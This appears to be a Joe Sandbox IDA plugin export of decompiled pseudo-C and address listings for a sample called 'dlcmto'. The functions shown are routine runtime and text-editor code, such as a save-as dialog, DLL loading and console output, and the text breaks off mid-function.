                                          0x011924b8
                                          0x011924bd
                                          0x011924c1
                                          0x011924c7
                                          0x011924cc
                                          0x011924cc
                                          0x011924cc
                                          0x011924d1
                                          0x01192418
                                          0x01192418
                                          0x0119241c
                                          0x011924d6
                                          0x011924db
                                          0x011924e0
                                          0x011924e0
                                          0x011924e5
                                          0x011924e8
                                          0x011924ed
                                          0x011924f2
                                          0x011924f5
                                          0x011924f8
                                          0x011924fc
                                          0x01192502
                                          0x01192506
                                          0x0119250a
                                          0x01192510
                                          0x01192515
                                          0x01192519
                                          0x0119251f
                                          0x01192524
                                          0x01192524
                                          0x01192524
                                          0x01192529
                                          0x0119252c
                                          0x0119252c
                                          0x0119252c
                                          0x0119252f
                                          0x00000000
                                          0x00000000
                                          0x01192531
                                          0x01192535
                                          0x01192538
                                          0x0119253b
                                          0x0119253f
                                          0x0119253f
                                          0x01192544
                                          0x01192548
                                          0x0119254a
                                          0x0119254c
                                          0x0119254c
                                          0x0119254f
                                          0x01192552
                                          0x01192554
                                          0x01192554
                                          0x01192557
                                          0x0119255b
                                          0x0119255d
                                          0x01192561
                                          0x01192564
                                          0x01192567
                                          0x0119256b
                                          0x0119256b
                                          0x01192575
                                          0x01192575
                                          0x01192422
                                          0x01192427
                                          0x0119242c
                                          0x0119242c
                                          0x01192431
                                          0x01192434
                                          0x01192439
                                          0x0119243e
                                          0x01192441
                                          0x01192444
                                          0x01192448
                                          0x0119244e
                                          0x01192452
                                          0x01192456
                                          0x0119245c
                                          0x01192461
                                          0x01192465
                                          0x0119246b
                                          0x01192470
                                          0x01192470
                                          0x01192470
                                          0x01192475
                                          0x01192475
                                          0x01192475
                                          0x00000000
                                          0x01192416
                                          0x011923e0
                                          0x011923d4
                                          0x00000000
                                          0x011923b2
                                          0x011923b2
                                          0x011923ba
                                          0x011927a2
                                          0x011927a5
                                          0x011927a7
                                          0x01192899
                                          0x0119289a
                                          0x0119289e
                                          0x0119289e
                                          0x011928a1
                                          0x011928a5
                                          0x011928a7
                                          0x011928a8
                                          0x011928a9
                                          0x011928a9
                                          0x011928a9
                                          0x011928ac
                                          0x011928ac
                                          0x011928af
                                          0x011928b3
                                          0x011928b5
                                          0x011928b8
                                          0x011928b8
                                          0x011928bb
                                          0x011928bb
                                          0x011928bb
                                          0x011928be
                                          0x011928be
                                          0x011927ad
                                          0x011927af
                                          0x011927b2
                                          0x011927b2
                                          0x011927b5
                                          0x011927c0
                                          0x011927c4
                                          0x011927c9
                                          0x011927ce
                                          0x011927d3
                                          0x011927d7
                                          0x011927dc
                                          0x011927e1
                                          0x011927e6
                                          0x011927eb
                                          0x011927f0
                                          0x011927f5
                                          0x011927fa
                                          0x011927ff
                                          0x01192804
                                          0x01192809
                                          0x0119280e
                                          0x01192814
                                          0x01192814
                                          0x0119281a
                                          0x0119281a
                                          0x0119281a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011923ba
                                          0x0119239e
                                          0x0119239e
                                          0x011923a6
                                          0x011923a6
                                          0x01192381
                                          0x01192381
                                          0x01192389
                                          0x0119281d
                                          0x0119281d
                                          0x0119281f
                                          0x01192823
                                          0x01192826
                                          0x01192828
                                          0x01192830
                                          0x01192830
                                          0x01192834
                                          0x01192839
                                          0x0119283d
                                          0x01192842
                                          0x01192845
                                          0x01192845
                                          0x01192848
                                          0x01192848
                                          0x01192848
                                          0x01192830
                                          0x00000000
                                          0x01192828
                                          0x01192880
                                          0x01192886
                                          0x0119238f
                                          0x01192577
                                          0x01192577
                                          0x0119257d
                                          0x01192581
                                          0x01192583
                                          0x01192584
                                          0x01192587
                                          0x0119258a
                                          0x0119258a
                                          0x01192592
                                          0x01192592
                                          0x01192594
                                          0x01192597
                                          0x00000000
                                          0x0119259d
                                          0x011925a0
                                          0x011925a5
                                          0x00000000
                                          0x011925ca
                                          0x00000000
                                          0x00000000
                                          0x011925ce
                                          0x011925d0
                                          0x011925d4
                                          0x011925d5
                                          0x011925d6
                                          0x00000000
                                          0x00000000
                                          0x011925da
                                          0x011925dc
                                          0x011925df
                                          0x011925e2
                                          0x011925e6
                                          0x011925e7
                                          0x011925e8
                                          0x00000000
                                          0x00000000
                                          0x011925ee
                                          0x011925f3
                                          0x011925f9
                                          0x011925fc
                                          0x01192600
                                          0x01192601
                                          0x01192602
                                          0x00000000
                                          0x00000000
                                          0x011925a5
                                          0x01192597
                                          0x01192389
                                          0x0119237f
                                          0x01192368
                                          0x01192368
                                          0x0119236a
                                          0x01192604
                                          0x01192607
                                          0x0119260a
                                          0x0119260d
                                          0x01192764
                                          0x01192764
                                          0x0119276a
                                          0x0119276c
                                          0x0119276f
                                          0x01192774
                                          0x01192776
                                          0x01192779
                                          0x01192779
                                          0x01192781
                                          0x01192783
                                          0x01192785
                                          0x01192785
                                          0x01192788
                                          0x0119278d
                                          0x0119278f
                                          0x0119278f
                                          0x0119278f
                                          0x01192785
                                          0x0119279a
                                          0x01192613
                                          0x01192613
                                          0x0119261b
                                          0x011926b5
                                          0x011926bb
                                          0x011926bd
                                          0x011926bd
                                          0x011926be
                                          0x011926bf
                                          0x011926c2
                                          0x011926c4
                                          0x011926c4
                                          0x011926cc
                                          0x011926cc
                                          0x011926cc
                                          0x011926d2
                                          0x00000000
                                          0x00000000
                                          0x011926d4
                                          0x011926da
                                          0x011926e0
                                          0x011926e4
                                          0x011926e9
                                          0x011926ee
                                          0x011926f3
                                          0x011926f8
                                          0x011926fd
                                          0x01192702
                                          0x01192707
                                          0x0119270b
                                          0x01192710
                                          0x01192715
                                          0x0119271a
                                          0x0119271f
                                          0x01192724
                                          0x01192729
                                          0x0119272e
                                          0x01192734
                                          0x0119273a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119273a
                                          0x0119273c
                                          0x0119273f
                                          0x01192741
                                          0x01192741
                                          0x01192744
                                          0x01192747
                                          0x0119274b
                                          0x01192750
                                          0x01192754
                                          0x01192759
                                          0x0119275c
                                          0x0119275c
                                          0x01192741
                                          0x00000000
                                          0x0119273f
                                          0x00000000
                                          0x01192621
                                          0x01192621
                                          0x01192627
                                          0x0119262b
                                          0x0119262e
                                          0x0119262e
                                          0x01192630
                                          0x01192633
                                          0x01192636
                                          0x01192637
                                          0x01192638
                                          0x01192638
                                          0x01192638
                                          0x01192630
                                          0x0119263d
                                          0x01192640
                                          0x00000000
                                          0x01192646
                                          0x01192654
                                          0x01192655
                                          0x01192657
                                          0x01192658
                                          0x00000000
                                          0x01192676
                                          0x00000000
                                          0x00000000
                                          0x0119267b
                                          0x0119267e
                                          0x01192682
                                          0x01192683
                                          0x01192684
                                          0x00000000
                                          0x00000000
                                          0x01192688
                                          0x0119268b
                                          0x0119268e
                                          0x01192691
                                          0x01192694
                                          0x01192698
                                          0x01192699
                                          0x0119269a
                                          0x00000000
                                          0x00000000
                                          0x0119269f
                                          0x011926a5
                                          0x011926ab
                                          0x011926ae
                                          0x011926b2
                                          0x011926b3
                                          0x011926b4
                                          0x00000000
                                          0x00000000
                                          0x01192658
                                          0x01192640
                                          0x0119261b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119236a
                                          0x01192282
                                          0x00000000
                                          0x01192282
                                          0x01192280
                                          0x0119227e
                                          0x00000000
                                          0x01192287
                                          0x01192287
                                          0x01192289
                                          0x01192290
                                          0x00000000
                                          0x01192292
                                          0x00000000
                                          0x01192290
                                          0x01192255
                                          0x00000000

                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 01192227
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0119222F
                                          • _ValidateLocalCookies.LIBCMT ref: 011922B8
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 011922E3
                                          • _ValidateLocalCookies.LIBCMT ref: 01192338
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 105275f8952b5e5137c46f9b0472aef5db9959760627ca5b3bd37ab8af9a23d7
                                          • Instruction ID: 736b88446b783184c5e07a5894390c6ce887ed54036ac88787ad58db49de0cc0
                                          • Opcode Fuzzy Hash: 105275f8952b5e5137c46f9b0472aef5db9959760627ca5b3bd37ab8af9a23d7
                                          • Instruction Fuzzy Hash: 2F41D338E00219ABCF18DFA8C880A9EBFB5FF44328F148095E9345B391D735EA15CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119521C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0119521C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x11a9228 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x11a06a8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E0119724E(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E0119724E(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                          0x01195225
                                          0x011952cf
                                          0x0119522d
                                          0x0119522f
                                          0x01195236
                                          0x01195238
                                          0x0119523e
                                          0x0119524b
                                          0x01195260
                                          0x01195264
                                          0x011952b6
                                          0x011952b6
                                          0x011952bb
                                          0x011952bf
                                          0x011952c2
                                          0x011952c2
                                          0x011952c8
                                          0x011952ca
                                          0x011952df
                                          0x011952da
                                          0x011952de
                                          0x011952de
                                          0x011952cc
                                          0x011952cc
                                          0x00000000
                                          0x011952cc
                                          0x01195266
                                          0x0119526f
                                          0x011952a6
                                          0x011952a6
                                          0x011952a8
                                          0x011952aa
                                          0x00000000
                                          0x00000000
                                          0x011952b2
                                          0x00000000
                                          0x011952b2
                                          0x01195279
                                          0x0119527e
                                          0x01195283
                                          0x00000000
                                          0x00000000
                                          0x0119528d
                                          0x01195292
                                          0x01195297
                                          0x00000000
                                          0x00000000
                                          0x0119529c
                                          0x011952a2
                                          0x00000000
                                          0x011952a2
                                          0x01195243
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01195249
                                          0x011952d8
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 512f937a422be195d953bbd487a043cee3391135027fdd9fc0f620fac0758011
                                          • Instruction ID: 069a0828954e84dedff2a3810d89bda81e3d7832bd2b159bccdceaa634be0aa3
                                          • Opcode Fuzzy Hash: 512f937a422be195d953bbd487a043cee3391135027fdd9fc0f620fac0758011
                                          • Instruction Fuzzy Hash: 4D21AB31E05311EBDFBF8A68EC41B1A3B5A5F45660F2505A2FD36BB181D730E90086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01191000 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E01191000() {
				char _v532;
				intOrPtr _t21;
				intOrPtr _t22;
				WCHAR* _t27;
				int _t35;
				struct tagOFNA* _t38;
				void* _t40;

				_t35 = GetWindowTextLengthW( *0x11a7abc);
				if(SendMessageW( *0x11a7abc, 0xb8, 0, 0) == 0 || _t35 == 0 ||  *0x11a7f40 != 0) {
					return 1;
				} else {
					_pop(_t37);
					asm("xorps xmm0, xmm0");
					_t38 = _t40 - 0x260;
					asm("movups [esi+0x10], xmm0");
					asm("movups [esi+0x20], xmm0");
					asm("movups [esi+0x30], xmm0");
					asm("movups [esi+0x40], xmm0");
					 *((intOrPtr*)(_t38 + 0x54)) = 0;
					 *((intOrPtr*)(_t38 + 0x50)) = 0;
					_t27 =  &_v532;
					lstrcpyW(_t27, L"*.txt");
					 *_t38 = 0x58;
					_t21 =  *0x11a7ab4; // 0x0
					 *((intOrPtr*)(_t38 + 4)) = _t21;
					_t22 =  *0x11a7ab0; // 0x0
					 *((intOrPtr*)(_t38 + 8)) = _t22;
					 *((intOrPtr*)(_t38 + 0xc)) = 0x11a8354;
					 *(_t38 + 0x1c) = _t27;
					 *((intOrPtr*)(_t38 + 0x20)) = 0;
					 *((intOrPtr*)(_t38 + 0x34)) = 0x880866;
					 *((intOrPtr*)(_t38 + 0x44)) = E011910D6;
					 *((intOrPtr*)(_t38 + 0x48)) = 0x190;
					 *((intOrPtr*)(_t38 + 0x3c)) = 0x11a0026;
					 *0x11a8818 =  *0x11a8350;
					 *0x11a881c = 0;
					return 0 | GetSaveFileNameW(_t38) != 0x00000000;
				}
			}










                                          0x0119100d
                                          0x01191026
                                          0x01191040
                                          0x01191036
                                          0x01191036
                                          0x01191250
                                          0x01191253
                                          0x01191255
                                          0x01191259
                                          0x0119125d
                                          0x01191261
                                          0x01191267
                                          0x0119126a
                                          0x0119126d
                                          0x01191277
                                          0x0119127d
                                          0x01191283
                                          0x01191288
                                          0x0119128b
                                          0x01191290
                                          0x01191293
                                          0x0119129a
                                          0x0119129d
                                          0x011912a0
                                          0x011912a7
                                          0x011912ae
                                          0x011912b5
                                          0x011912c1
                                          0x011912c6
                                          0x011912e5
                                          0x011912e5

                                          APIs
                                          • GetWindowTextLengthW.USER32 ref: 01191007
                                          • SendMessageW.USER32(000000B8,00000000,00000000), ref: 0119101E
                                          • lstrcpyW.KERNEL32 ref: 01191277
                                          • GetSaveFileNameW.COMDLG32 ref: 011912CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileLengthMessageNameSaveSendTextWindowlstrcpy
                                          • String ID: *.txt$txt
                                          • API String ID: 4130679656-571010898
                                          • Opcode ID: 96c90ef50f27768cfd3f3cccfc094ce4330e9cc8345439fd01c59f39c08f9530
                                          • Instruction ID: a4c51a404c45b0fdfc7a139966b0749f5cb86a7018d18f7137c9f49bd2117d12
                                          • Opcode Fuzzy Hash: 96c90ef50f27768cfd3f3cccfc094ce4330e9cc8345439fd01c59f39c08f9530
                                          • Instruction Fuzzy Hash: C421B075900780DFD378CF29EA44563BFF4FB88314B848A2EE8A6C2A54D771A5C4CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197063 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01197063(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E01197147(_t45, 7);
					E01197147(_t45 + 0x1c, 7);
					E01197147(_t45 + 0x38, 0xc);
					E01197147(_t45 + 0x68, 0xc);
					E01197147(_t45 + 0x98, 2);
					E011963FE( *((intOrPtr*)(_t45 + 0xa0)));
					E011963FE( *((intOrPtr*)(_t45 + 0xa4)));
					E011963FE( *((intOrPtr*)(_t45 + 0xa8)));
					E01197147(_t45 + 0xb4, 7);
					E01197147(_t45 + 0xd0, 7);
					E01197147(_t45 + 0xec, 0xc);
					E01197147(_t45 + 0x11c, 0xc);
					E01197147(_t45 + 0x14c, 2);
					E011963FE( *((intOrPtr*)(_t45 + 0x154)));
					E011963FE( *((intOrPtr*)(_t45 + 0x158)));
					E011963FE( *((intOrPtr*)(_t45 + 0x15c)));
					return E011963FE( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                          0x01197069
                                          0x0119706e
                                          0x01197077
                                          0x01197082
                                          0x0119708d
                                          0x01197098
                                          0x011970a6
                                          0x011970b1
                                          0x011970bc
                                          0x011970c7
                                          0x011970d5
                                          0x011970e3
                                          0x011970f4
                                          0x01197102
                                          0x01197110
                                          0x0119711b
                                          0x01197126
                                          0x01197131
                                          0x00000000
                                          0x01197141
                                          0x01197146

                                          APIs
                                            • Part of subcall function 01197147: _free.LIBCMT ref: 0119716C
                                          • _free.LIBCMT ref: 011970B1
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 011970BC
                                          • _free.LIBCMT ref: 011970C7
                                          • _free.LIBCMT ref: 0119711B
                                          • _free.LIBCMT ref: 01197126
                                          • _free.LIBCMT ref: 01197131
                                          • _free.LIBCMT ref: 0119713C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: bbc1a6c505bc259f1e6dec9077c48e37d314695afe771bd27229316765e8b9d2
                                          • Instruction ID: cab00e4af23cdaa4747577f62615e844cf9e6ae3e23013006559aacabd448f4e
                                          • Opcode Fuzzy Hash: bbc1a6c505bc259f1e6dec9077c48e37d314695afe771bd27229316765e8b9d2
                                          • Instruction Fuzzy Hash: 6F114FB1550B4ABBEF24BBB0CC05FCB779FDF54B04F801839E2AD66090DB65B5148A50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119AD5F Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0119AD5F(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x11a7210; // 0x1c85f4c4
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x11a9458 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E01195C6A( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x11a9458 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x11a7968)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x11a9458 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x11a7968)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x11a9458 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E01192350( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x11a9458 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E0119CDBC(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E011986B8(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E0119717F(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x11a9458 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x11a9458 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x11a9458 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E0119C0F0( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
